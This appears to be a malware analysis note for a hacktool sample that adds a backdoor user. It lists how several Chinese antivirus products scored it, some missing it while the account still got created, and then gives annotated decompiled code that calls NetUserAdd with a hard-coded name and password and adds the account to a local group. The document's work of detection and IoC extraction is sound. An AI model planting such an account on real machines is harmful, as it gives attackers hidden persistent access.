Hacktool/AddUser
火绒
扫描&运行:MISS,被添加账户
X-Sec
扫描:MISS
华为乾坤
扫描&运行:MISS。被添加账户
WV
运行:拦截
冰盾
运行:MISS
// Decompiler pseudocode excerpt (the _QWORD/_DWORD casts and 0i64 literals look like
// Hex-Rays output; the enclosing function's signature and declarations are not shown).
// Flow: create a local account with a hard-coded name and password via NetUserAdd,
// resolve its SID with LookupAccountNameW, then add that SID to a local group via
// NetLocalGroupAddMembers. Returns 0 on success, otherwise the failing API's error code.
// Detection note: with account-management auditing enabled, a successful run would be
// expected to log Security events 4720 (account created) and 4732 (member added to a
// local group); the literal account name and password below are usable as string IoCs.
// The written offsets match the 64-bit USER_INFO_1 layout (level 1 is passed below).
// Offsets 16, 24 and 32 (password_age, home_dir, comment) are not written in this
// excerpt; presumably buf is zeroed earlier, TODO confirm.
- *(_QWORD *)buf = L"audit"; // usri1_name: hard-coded account name
- *(_QWORD *)&buf[8] = L"Aa123456"; // usri1_password: hard-coded cleartext password
- *(_DWORD *)&buf[20] = 1; // usri1_priv: 1 == USER_PRIV_USER
- *(_DWORD *)&buf[40] = 513; // usri1_flags: 0x201 == UF_SCRIPT | UF_NORMAL_ACCOUNT
- *(_QWORD *)&buf[48] = 0i64; // usri1_script_path: NULL
- v10 = NetUserAdd(0i64, 1u, buf, 0i64); // servername NULL = local machine; level 1; parm_err not requested
- if ( v10 )
- {
- wprintf(L"NetUserAdd FAIL %d 0x%08x\r\n", v10, v10);
- return v10;
- }
// Account exists now; look up its SID. The initial values of cbSid and
// cchReferencedDomainName are set outside this excerpt.
- else if ( LookupAccountNameW(0i64, L"audit", Sid, &cbSid, ReferencedDomainName, &cchReferencedDomainName, &peUse) )
- {
- *(_QWORD *)v6 = Sid; // level-0 member entry (LOCALGROUP_MEMBERS_INFO_0.lgrmi0_sid)
// NOTE(review): the group name is rendered as the narrow string "A"; this is most
// likely a wide string that the decompiler cut at its first NUL byte. The real group
// name (presumably a privileged local group) must be confirmed in the binary.
- v10 = NetLocalGroupAddMembers(0i64, "A", 0, v6, 1u); // local machine, level 0, one entry
- if ( v10 )
- {
- wprintf(L"NetLocalGroupAddMembers FAIL %d 0x%08x\r\n", v10, v10);
- return v10;
- }
- else
- {
- return 0i64; // account created and added to the group
- }
- }
- else
- {
// SID lookup failed: report GetLastError(). The account created above is not
// removed on this path (nor on the group-add failure path).
- LastError = GetLastError();
- wprintf(L"LookupAccountName FAIL %d 0x%08x\r\n", LastError, LastError);
- return LastError;
- }